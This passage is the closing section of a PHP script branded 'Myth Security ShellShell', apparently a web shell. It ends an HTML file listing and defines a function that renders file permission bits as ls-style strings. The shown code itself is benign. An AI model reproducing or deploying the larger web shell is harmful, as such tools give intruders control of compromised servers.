  725. echo '</table>
  726. </div>';
  727. }
  728. echo '<center><br/>Myth Security ShellShell</center>
  729. </body>
  730. </html>';
  // Formats the mode bits of $file as a 10-character ls-style string: one file-type character
  // followed by three rwx triplets, with setuid/setgid/sticky shown as s/S, s/S and t/T.
  // The listing code above calls this for every directory and file row. The function is declared
  // at the end of the script, after its call sites.
  731. function perms($file){
  732. $perms = fileperms($file);
  // File-type character, tested from the highest type mask down.
  733. if (($perms & 0xC000) == 0xC000) {
  734. // Socket
  735. $info = 's';
  736. } elseif (($perms & 0xA000) == 0xA000) {
  737. // Symbolic Link
  738. $info = 'l';
  739. } elseif (($perms & 0x8000) == 0x8000) {
  740. // Regular
  741. $info = '-';
  742. } elseif (($perms & 0x6000) == 0x6000) {
  743. // Block special
  744. $info = 'b';
  745. } elseif (($perms & 0x4000) == 0x4000) {
  746. // Directory
  747. $info = 'd';
  748. } elseif (($perms & 0x2000) == 0x2000) {
  749. // Character special
  750. $info = 'c';
  751. } elseif (($perms & 0x1000) == 0x1000) {
  752. // FIFO pipe
  753. $info = 'p';
  754. } else {
  755. // Unknown
  756. $info = 'u';
  757. }
  758. // Owner
  759. $info .= (($perms & 0x0100) ? 'r' : '-');
  760. $info .= (($perms & 0x0080) ? 'w' : '-');
  // Execute slot: 0x0800 (setuid) turns x into s, or - into S when execute is not set.
  761. $info .= (($perms & 0x0040) ?
  762. (($perms & 0x0800) ? 's' : 'x' ) :
  763. (($perms & 0x0800) ? 'S' : '-'));
  764. // Group
  765. $info .= (($perms & 0x0020) ? 'r' : '-');
  766. $info .= (($perms & 0x0010) ? 'w' : '-');
  // Execute slot: 0x0400 (setgid) turns x into s, or - into S when execute is not set.
  767. $info .= (($perms & 0x0008) ?
  768. (($perms & 0x0400) ? 's' : 'x' ) :
  769. (($perms & 0x0400) ? 'S' : '-'));
  770. // World
  771. $info .= (($perms & 0x0004) ? 'r' : '-');
  772. $info .= (($perms & 0x0002) ? 'w' : '-');
  // Execute slot: 0x0200 (sticky) turns x into t, or - into T when execute is not set.
  773. $info .= (($perms & 0x0001) ?
  774. (($perms & 0x0200) ? 't' : 'x' ) :
  775. (($perms & 0x0200) ? 'T' : '-'));
  776. return $info;
  777. }
  778. ?>